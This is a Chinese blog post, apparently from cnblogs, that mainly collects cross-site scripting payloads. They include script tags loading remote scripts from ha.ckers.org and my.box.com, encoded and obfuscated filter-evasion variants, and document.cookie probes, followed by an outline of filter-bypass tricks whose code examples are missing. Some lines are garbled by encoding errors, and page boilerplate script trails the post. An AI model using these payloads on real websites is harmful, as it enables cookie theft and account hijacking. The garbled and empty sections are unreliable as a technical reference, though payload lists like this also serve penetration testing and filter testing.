<IMG SRC=" &#14;  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
約cript綼lert(SS??script?
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION
<form><button formaction="javascript:alert(123)">crosssitespt
<frameset onload=alert(123)>
<!--<img src="--><img src=x onerror=alert(123)//">
<style><img src="</style><img src=x onerror=alert(123)//">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="javascript:alert(1)">
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<script>({0:#0=alert/#0#/#0#(123)})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
<script src="#">{alert(1)}</script>;1
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
<svg xmlns="#"><script>alert(1)</script></svg>
<svg onload="javascript:alert(123)" xmlns="#"></svg>
<iframe xmlns="#" src="javascript:alert(1)"></iframe>
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
?<s?2b攃ript>alert(document.cookie)</script>
?<ScRiPt>alert(document.cookie)</script>
?<<script>alert(document.cookie);//<</script>
foo<script>alert(document.cookie)</script>
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%22/%3E%3CBODY%20onload=抎ocument.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)?3E
? alert(document.cookie); var foo=?
foo\? alert(document.cookie);//?
</script><script >alert(document.cookie)</script>
<img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert(扻SS?>
<script>alert(1)</script>
"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>

emmm这么多的payload，先收集着吧，说不定就哪天用到了（一直没用）。别到了用的那天因为自己觉得没用就手头上没有。。
其实吧我倒是有了读xsser源码的想法，然后自己定制payload，包括sqlmap,sqlmap自动化扫描emmm是很强，但是这种工具加上自己的payload发挥出来的作用比傻乎乎的用自带的脚本好多了~
扫描器的话有了点想法，但是
不管是多线程还是异步协程都好慢。。等有时间再处理吧，下次可以换成celery异步
可能是有生之年系列233.

0x06 XSS 绕过过滤技巧

1:绕过单引号过滤
问题代码：

payload:

所有的输入就会变成这样:

1.1:绕过单引号过滤

同样的例子，但是我们假设管理员在我们的单引号之前放置了一个“”，有时候双引号之前也会放置，通 过一些类似 add_slashes 的函数可以实现，这个就是转义字符，我们先前的代码就会变成这样：

使用&quto;或者& #34; 来代替我们的双引号，有时候可以绕过过滤。

如果这都被过滤了。那我们可以使用 JavaScript 的 fromCharCode 函数，这个函数把指定的 Unicode 值转换成字符串。

你可以使用 Mysql 数据库的 char（字符，字符）来转换字符到字符码，大家可以使用自己喜欢的就行了。
2绕过 过滤

有些过滤器会过滤

3：使用 IMG 源

Html 中最常用的两个标签 img 和 a href 一般是不会过滤的，一个指定图片，一个指定超链接。最危险的 是 img 标签。

4:使用制表符, 换行符和回车符

5:使用空字符

6:双引号配对的bug

7:转义字符

8：不全面的过滤器

9:编码

先更新到这里。。

posted @
2020-01-29 16:32 
王叹之 
阅读(...) 
评论(...) 
编辑 
收藏

markdown_highlight();

var allowComments = true, cb_blogId = 506541, cb_blogApp = 'wangtanzhi', cb_blogUserGuid = '189bde9b-4013-4473-070f-08d6a41df17b';
var cb_entryId = 12240667, cb_entryCreatedDate = '2020-01-29 16:32', cb_postType = 1;
loadViewCount(cb_entryId);

var commentManager = new blogCommentManager();
commentManager.renderComments(0);

刷新评论刷新页面返回顶部

var googletag = googletag || {};
googletag.cmd = googletag.cmd || [];

googletag.cmd.push(function () {
googletag.defineSlot("/1090369/C1", [300, 250], "div-gpt-ad-1546353474406-0").addService(googletag.pubads());
googletag.defineSlot("/1090369/C2", [468, 60], "div-gpt-ad-1539008685004-0").addService(googletag.pubads());
googletag.pubads().enableSingleRequest();
googletag.enableServices();
});

if (new Date() >= new Date(2018, 9, 13)) {
googletag.cmd.push(function () { googletag.display("div-gpt-ad-1539008685004-0"); });
}

fixPostBody();
setTimeout(function() { incrementViewCount(cb_entryId); }, 50); deliverAdT2();
deliverAdC1();
deliverAdC2();
loadNewsAndKb();
loadBlogSignature();
LoadPostCategoriesTags(cb_blogId, cb_entryId); LoadPostInfoBlock(cb_blogId, cb_entryId, cb_blogApp, cb_blogUserGuid);
GetPrevNextPost(cb_entryId, cb_blogId, cb_entryCreatedDate, cb_postType);
loadOptUnderPost();
GetHistoryToday(cb_blogId, cb_blogApp, cb_entryCreatedDate);